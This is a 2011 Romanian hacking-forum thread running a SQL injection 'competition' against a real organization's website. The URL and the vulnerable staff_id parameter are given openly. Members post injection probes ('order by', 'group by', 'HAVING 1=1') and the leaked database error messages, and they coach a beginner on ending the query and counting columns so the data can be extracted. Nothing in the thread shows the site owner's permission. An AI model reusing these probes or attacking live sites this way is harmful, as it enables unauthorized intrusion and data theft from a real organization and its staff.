[Easy/Medium] SQL Injection [6]

[vlad1395]

O noua competitie, care sper ca o sa va placa.

- Sintaxele nu se vor face publice, se vor trimite prin PM !

- Postati aici doar un screen-shot ca dovada ca ati rezolvat (fara a se vedea rezolvarea)

Cerere: Extrageti ce vreti .

Dificultate:Easy

Metoda: Union Based

Vulnerable Parameter: ICI -

SURSA: HF

Proof: http://img685.imageshack.us/img685/4452/icij.png

NOTA:: Injectia se va face DOAR pe parametrul dat de mine.

Solvers

1. daemien/denjacker

2. ZeroCold

Edited August 24, 2011 by vlad1395

[gigaevil]

Incerc de 20 de minute, dar inafara de eroare de sql nu primesc, ar fi interesant un mic help, sau daca s-a terminat cum ai facut.

[denjacker]

spune unde te-ai incurcat ca sa stim cum sa te ajutam mai departe.

[gigaevil]

Sunt incepator intre ale white hat hacking. De exemplu am gasit ca intradevar e vulnerabil la sql injection.

Si initial am scris

ICI - +order+by+1--

Mi-a dat o eroare serverul de sql, ceea ce nu trebuia ca exista coloana 1.

Chiar daca ii scriu 100 imi da aceeasi eroare

Discutam in privat?

[denjacker]

Discutam aici sa inteleaga si ceilalti.

http://www.communityinclusion.org/staff.php?staff_id=129+order+by+1--

hai sa privim eroarea mai atent :

error in query1: SELECT a.article_id AS article_idx, article_title, timestamp, article_blurb, article_year_pub, article_month_pub FROM article a, article_staff at WHERE at.article_id = a.article_id and at.staff_id = 129 order by 1-- ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5' at line 3

De aici ar trebuii sa deduci :

1] commentul folosit pentru a termina query-ul e incomplet sau ... inutil.

2] nu poti folosi "order by 1 ORDER BY rank" -- > ptr ca iti va genera eroare de sintaxa.

Incearca sa calculezi nr de coloane cu GROUP BY si apoi revino la punctul 1]. De fapt acolo e problema esentiala pentru rezolvarea competitiei.

[gigaevil]

Am incercat

' GROUP BY table.columnfromerror1 HAVING 1=1 --

' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --

' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1

si tot degeaba

[denjacker]

Nu fratioare...

http://www.communityinclusion.org/staff.php?staff_id=129+group+by+156353535353543534

error in query1: SELECT a.article_id AS article_idx, article_title, timestamp, article_blurb, article_year_pub, article_month_pub FROM article a, article_staff at WHERE at.article_id = a.article_id and at.staff_id = 129 group by 156353535353543534 ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5.Unknown column '156353535353543534' in 'group statement'

[totti93]

Nu are rost sa tot dai GROUP BY, cand se vede clar in eroare ca sunt selectate 6 coloane...

[Skiddie]

Nu merge linku.

[xaren]

Unknown column 'rank' in 'order clause'

As putea inlocui rank ala cu o cifra sau @@version sau ... ? !

[vlad1395]

@Skiddie: Link-ul merge.

@xaren: Nu inteleg intrebarea.

@All: A mai facut cineva inj3ctia..? daca da, postati aici Screen-Shoot, sau trmiteti prin PM. Have a nice day!

[ZeroCold]

[Net_Spy]

nice share vlad . done I was so stupid to look the termination , I was trying to make it more complex indeed it was fuckin easy.

Regards

Net_Spy